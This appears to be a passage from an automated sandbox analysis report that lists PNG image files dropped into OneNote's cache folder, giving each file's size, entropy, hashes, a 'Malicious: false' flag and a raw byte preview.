Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
